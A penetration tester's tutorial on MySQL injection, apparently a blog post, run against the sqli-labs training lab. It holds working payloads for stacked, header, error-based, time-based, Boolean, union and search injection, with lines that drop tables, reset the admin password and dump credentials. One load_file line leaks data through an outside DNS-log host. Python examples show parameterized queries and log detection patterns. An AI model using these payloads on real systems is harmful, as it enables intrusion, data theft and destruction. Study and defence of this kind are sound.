congdong007

Penetration Tester, Software Developer

In SQL, a semicolon marks the end of one statement, so stacked injection (also called stack-based injection) appends further statements after the injected value and has the database run several statements in one call. It differs from the other techniques on this page in that it depends on the application's database interface accepting more than one statement per call (for example mysqli_multi_query() in PHP), so it is often unavailable even where the query is otherwise injectable.

URL encodings used in the payloads below:

%27 --- '
%20 --- space

How can you find the target's table names and columns?

  1. Look for exploitable files exposed through directory traversal vulnerabilities, such as files with a .sql extension.
  2. Use directory/file fuzzing tools such as Dirsearch to search for .sql files.
  3. Search for source-code leakage on the target's website; the leaked source may contain exploitable files such as database dumps.
  4. Search for the target's website source code on GitHub.

Example:

http://192.168.1.33/sqli-labs-master/Less-38/?id=1'    // You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';    // it's ok
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';create table aa like users;    // creates a table named aa with the same structure as users
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';drop table aa--+
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';update users set password ='admin@1234' where username='admin'
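The limitation mentioned above is easiest to see side by side. This is an added Python example, not code from the original notes or from sqli-labs: the same string-built query is run through a single-statement API, a multi-statement API, and as a parameterized query, against a constructed in-memory SQLite table (the `users` schema, `PAYLOAD` and the helper names are assumptions for this illustration).

```python
import sqlite3

# Constructed in-memory stand-in for the lab's `users` table (not sqli-labs' own schema).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'secret')")
    con.commit()
    return con

def admin_password(con):
    return con.execute("SELECT password FROM users WHERE username='admin'").fetchone()[0]

# The user-controlled value, placed after the closing quote of id='...' as on the page.
PAYLOAD = "1';UPDATE users SET password='admin@1234' WHERE username='admin"

def lookup_single_statement(con, user_id):
    """String concatenation, but executed through an API that accepts exactly one
    statement per call: the stacked UPDATE is rejected and never runs."""
    sql = f"SELECT username FROM users WHERE id='{user_id}'"
    try:
        return [row[0] for row in con.execute(sql)]
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:
        # sqlite3 reports: "You can only execute one statement at a time."
        return "rejected: " + str(exc)

def lookup_multi_statement(con, user_id):
    """Same concatenation through a multi-statement API (cf. mysqli_multi_query in PHP):
    every statement in the string runs, including the injected UPDATE."""
    con.executescript(f"SELECT username FROM users WHERE id='{user_id}'")
    return admin_password(con)

def lookup_parameterized(con, user_id):
    """The fix: the value is bound as data, so its quote and semicolon never reach the parser."""
    return [row[0] for row in con.execute("SELECT username FROM users WHERE id=?", (user_id,))]

if __name__ == "__main__":
    con = make_db()
    print(lookup_single_statement(con, PAYLOAD), admin_password(con))   # rejected ..., secret
    print(lookup_multi_statement(make_db(), PAYLOAD))                   # admin@1234
    print(lookup_parameterized(make_db(), PAYLOAD))                     # []
```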

HTTP header injection is a security vulnerability that occurs when an attacker can place malicious content in HTTP headers that the application processes unsafely. This can have various security implications, including cross-site scripting (XSS) and other forms of web application exploitation. When the application stores a header such as the User-Agent in the database, the header becomes a SQL injection point: in the example below the User-Agent value reaches a query, and the error-based payload is carried in that header.

Example:

POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: 192.168.1.33
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.33
Content-Type: application/x-www-form-urlencoded
User-Agent:1' and updatexml(1,concat(0x7e,(user()),0x7e),1) and '1'='1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.33/sqli-labs-master/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

uname=admin&passwd=admin&submit=Submit

Response (excerpt):

XPATH syntax error: '~root@localhost~'

  1. Overview

Error-based injection deliberately triggers a database error so that the result of a subquery is echoed back inside the error message. It is useful when UNION-based injection is blocked but the application still returns database error text. It is also known as Formulaic SQL Injection.

  2. Utilizing the updatexml() function:

Payload:

?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1));--+

0x7e is the hex encoding of ~, used as a delimiter so the result stands out in the error text.
updatexml(): function used to update XML documents.
updatexml() syntax: updatexml(target_xml_document, xpath_expression, new_value)
XPath expressions specify paths within an XML document. When the second argument is not valid XPath (here, because of the ~ characters), MySQL raises an "XPATH syntax error" that quotes the offending expression, and with it the subquery result.

Subsequent steps for updatexml-based error-based injection:

(1) Replace the select user() subquery with the query for the value you want.
(2) Retrieve the tables in the current database.
(3) Retrieve the columns of a specific table.
(4) Continue step by step to the data itself.

  3. Utilizing the extractvalue() function:

Payload:

?id=1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+

extractvalue() is similar to updatexml(): extractvalue(xml_document, xpath_expression) returns the content of the nodes matched by the XPath expression, and an invalid expression triggers the same XPATH syntax error.
Subsequent steps for extractvalue-based error-based injection are the same as for updatexml.

  4. Utilizing the floor() function:

Payload:

?id=1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

The trick relies on floor(rand(0)*2), which with a fixed seed always yields the same sequence of 0s and 1s, being evaluated more than once per row during GROUP BY, so that the same key collides in the temporary table and the GROUP BY fails.
GROUP BY works by walking every row and keeping results in a temporary table: it computes the row's key and looks it up; if the key already exists, the temporary table is left unchanged, and if it does not exist, the row is inserted, which recomputes the key. Because rand() is evaluated again on insert, the inserted key can differ from the one just looked up, and a later row then collides with an existing key. MySQL reports this as a "Duplicate entry" error whose message contains the key, i.e. the concat()ed value we want.

  5. Additional Information:

These three functions are commonly used in error-based injections.

Sometimes an injection gives no direct feedback and time-based blind injection is not usable either. In such cases you can use an out-of-band channel, that is, a different protocol or channel such as HTTP requests, DNS resolution or SMB, to carry the data out. DNS-log blind injection reduces the number of requests sent and turns a blind injection into one with direct feedback.

DNS log: a DNS log service records the queries that reach its name server, including the full names looked up, for domains like www.xxx.com. Data embedded in a subdomain of a controlled domain therefore appears in the log as soon as the database host resolves it.

Conditions for utilization:

  1. secure_file_priv in mysql.ini must be empty.
  2. If secure_file_priv is NULL, importing and exporting files is not allowed at all.
  3. If secure_file_priv is set to /tmp, importing and exporting are limited to the /tmp directory.
  4. If secure_file_priv is empty (""), there is no restriction and importing and exporting are allowed anywhere.

Example:

?id=1' and load_file(concat('\\\\', (select database()), '.27epx0.ceye.io\\abc'))--+

Inside a MySQL string literal each backslash must be doubled, so '\\\\' yields the \\ prefix of a UNC path and '\\abc' the \abc share name. The UNC path is resolved by the MySQL server host, so this DNS lookup only happens when the server runs on Windows.

Time-Based Blind SQL Injection Steps:

  1. First, check if an injection vulnerability exists.
  2. Next, determine the injection type: character-based, numeric-based, or search-based.
  3. Determine the available injection method; in this case, union injection and Boolean-based blind injection are not available:
     ?id=1' and 1=1 %23 (Page response is normal)
     ?id=1' and 1=2 %23 (Page response is normal)
     ?id=1' and sleep(5) %23
     The page responds after a 5-second delay, showing that sleep() ran in the database and confirming time-based blind injection.
  4. Start by obtaining the length of the database name:
     ?id=1' and if((length(database())>7),sleep(5),1) %23 (5-second delay)
     ?id=1' and if((length(database())>8),sleep(5),1) %23 (No 5-second delay)
     This indicates that the database name has a length of 8 characters.
  5. Proceed to retrieve the database name character by character:
     ?id=1' and if((ascii(substr(database(),1,1))>n),sleep(5),1) %23
     Vary n and the substr() position to recover each character in turn.
     These steps describe a method for performing time-based blind SQL injection to extract information about the database, such as the length of the database name and the characters that make up the name.

Example of Time-Based Blind SQL Injection Operation:

http://127.0.0.1/sqli-labs-master/Less-9/?id=1'    // no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1"    // no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1\    // no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 1=1 --+    // no visible change
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) %23    // responds after 5 seconds: character-based blind injection
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 and sleep(5) %23    // responds quickly: not numeric-based blind injection
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>7),sleep(5),1) %23    // 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>8),sleep(5),1) %23    // no 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>114),sleep(5),1) %23    // 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>115),sleep(5),1) %23    // no 5-second delay, so the first character is 's'; continue the same way for the rest
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>3,sleep(5),1) --+    // 5-second delay
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>4,sleep(5),1) --+    // no 5-second delay

Boolean Blind SQL Injection Method

  1. First, obtain the length of the database name:

     ?id=1' and (length(database()))>n --+

  2. Next, retrieve the database name character by character:

     ?id=1' and (ascii(substr(database(),1,1))>n) --+

     Note: To determine the character at a specific position, you can use a binary search method.
     To obtain the second character of the database name, simply change the position in the "substr" function.

  3. Use Burp Suite's Intruder module to iterate through the possibilities.

  4. Obtain the number of tables:

     ?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3 --+

  5. Retrieve the length of the table names, then their characters, in the same way.
     These steps outline a method for conducting a blind Boolean-based SQL injection to gather information about a database, such as the database name and the number of tables.

Example of Boolean Blind SQL Injection Operation

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=1 --+ correct
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=2 --+ error
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3 --+ correct
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 4 --+ error
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>7 --+ correct: database name length is 8 or less
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>8 --+ error
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>114) --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>115) --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3 --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 4 --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 101) --+
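The character-by-character probing in the time-based and Boolean sections above is the same yes/no oracle, only the way the answer arrives differs. This added Python example (not from the original notes) simulates that oracle locally, with no network involved, to show how the binary search the Boolean section mentions reduces the probe count from hundreds to about seven per character; that burst of near-identical requests differing only in a threshold is also the pattern a defender sees in access logs. `SECRET_DB_NAME`, the `Oracle` class and the function names are constructed for the simulation.

```python
# Constructed local stand-in for the blind-injection oracle used above. Each method
# answers the same yes/no question the page sends as one HTTP request, e.g.
#   ?id=1' and if((ascii(substr(database(),1,1))>n),sleep(5),1) %23
# and counts how many such requests a server would have received.
SECRET_DB_NAME = "security"   # the lab database name the page's examples recover

class Oracle:
    def __init__(self, secret):
        self._secret = secret
        self.requests = 0     # one per probe, i.e. one HTTP request in a real run

    def length_greater_than(self, n):            # length(database()) > n
        self.requests += 1
        return len(self._secret) > n

    def char_greater_than(self, pos, n):         # ascii(substr(database(),pos,1)) > n
        self.requests += 1
        return ord(self._secret[pos - 1]) > n    # substr() positions are 1-based

def bisect_value(greater_than, lo, hi):
    """Smallest v in [lo, hi] for which greater_than(v) is False: ~log2(hi - lo) probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract_binary(oracle, max_len=64):
    """Length first, then each character by binary search over printable ASCII 32..126."""
    length = bisect_value(oracle.length_greater_than, 0, max_len)
    return "".join(chr(bisect_value(lambda n: oracle.char_greater_than(pos, n), 32, 126))
                   for pos in range(1, length + 1))

def extract_linear(oracle, max_len=64):
    """The naive 'try n = 32, 33, 34, ...' walk, kept only to compare request counts."""
    length = 0
    while length < max_len and oracle.length_greater_than(length):
        length += 1
    chars = []
    for pos in range(1, length + 1):
        n = 32
        while n < 126 and oracle.char_greater_than(pos, n):
            n += 1
        chars.append(chr(n))
    return "".join(chars)

if __name__ == "__main__":
    fast, slow = Oracle(SECRET_DB_NAME), Oracle(SECRET_DB_NAME)
    print(extract_binary(fast), "probes:", fast.requests)
    print(extract_linear(slow), "probes:", slow.requests)
```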

Union SQL Injection Detection Methods

  1. First, check for the existence of an SQL injection vulnerability.
  2. Then, determine the injection type: character-based, numeric-based, or search-based.
  3. Use "order by" to identify the number of columns:
     ?id=1' order by 3 --+ (normal)
     ?id=1' order by 4 --+ (error)
  4. Once the number of columns is known, find which columns are displayed on the page and replace those display positions with MySQL functions such as database() and version().
  5. Retrieve the tables in the current database:
     ?id=-1' union select 1, group_concat('<br>', table_name), version() from information_schema.tables where table_schema=database()--+
  6. After obtaining the tables, retrieve the columns in those tables:
     ?id=-1' union select 1, group_concat('<br>', column_name), version() from information_schema.columns where table_schema=database() and table_name='users'--+
  7. Retrieve the data:
     ?id=-1' union select 1, group_concat('|', username), group_concat('|', password) from users--+
     These steps describe how an attacker can detect and exploit a SQL injection vulnerability to extract information from a database.

Example of Union SQL Injection Operation

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 --+ correct
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4 --+ error
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),version() --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',table_name),version() from information_schema.tables where table_schema=database()--+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',column_name),version() from information_schema.columns where table_schema=database() and table_name='users' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, username,password from users --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat('|',username),group_concat('|',password) from users --+

Search-Based Injection Detection Methods:

  1. Input the search keyword:

     keyword'

     If an error occurs, there's a high probability of a vulnerability.

  2. Input the search keyword:

     keyword%'

     If an error occurs, there's a high probability of a vulnerability.

  3. Input the search keyword:

     keyword%' and 1=1 and '%'='

     Observe the response.

  4. Input the search keyword:

     keyword%' and 1=2 and '%'='

     Observe the response; a difference from step 3 means the injected condition is being evaluated.

Search-Based Injection Detection Statements:

' and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='
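As an added detection-side example (not part of the original notes), the following Python scans constructed access-log lines for the payload families used throughout this page, first undoing the %27/%20/--+ encodings listed at the top. The signature names, regexes, log format handling and sample log lines are all my own constructions, not a tuned WAF ruleset.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload families shown on this page (constructed, illustrative only).
SIGNATURES = {
    "time_based":   re.compile(r"\bsleep\s*\(", re.I),
    "error_based":  re.compile(r"\b(updatexml|extractvalue)\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I),
    "union_based":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.", re.I),
    "stacked":      re.compile(r";\s*(create|drop|update|insert|delete)\b", re.I),
    "boolean":      re.compile(r"'\s*and\s+\d+\s*=\s*\d+|'\s*(and|or)\s+\(*(length|ascii|ord)\s*\(", re.I),
    "out_of_band":  re.compile(r"\bload_file\s*\(", re.I),
}

# Request field of an Apache/nginx combined log line: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

def normalize(value):
    """Undo the encodings the page lists (%27 -> ', %20 and + -> space, %23 -> #).
    Decoded twice so a double-encoded %2527 is caught as well."""
    return unquote_plus(unquote_plus(value))

def classify(text):
    """Names of the signature families matching a decoded parameter or header value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_log_line(line):
    """(path, tags) for a flagged access-log line, None if it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    tags = classify(normalize(query))
    return (path, tags) if tags else None

def scan(lines):
    return [hit for hit in map(scan_log_line, lines) if hit]

# Constructed access-log lines replaying the lab requests from this page, plus one benign request.
LOG_LINES = [
    '127.0.0.1 - - [10/Oct/2023:12:00:01 +0800] "GET /sqli-labs-master/Less-9/?id=1%27%20and%20sleep(5)%20%23 HTTP/1.1" 200 721',
    '127.0.0.1 - - [10/Oct/2023:12:00:02 +0800] "GET /sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables--+ HTTP/1.1" 200 958',
    '127.0.0.1 - - [10/Oct/2023:12:00:03 +0800] "GET /sqli-labs-master/Less-38/?id=1%27;drop%20table%20aa--+ HTTP/1.1" 200 733',
    '127.0.0.1 - - [10/Oct/2023:12:00:04 +0800] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 733',
]

if __name__ == "__main__":
    for path, tags in scan(LOG_LINES):
        print(path, tags)
```

Payloads carried in headers, like the User-Agent in the Less-18 example, only appear in the log if the log format records that header; `classify()` can be applied to the header value directly.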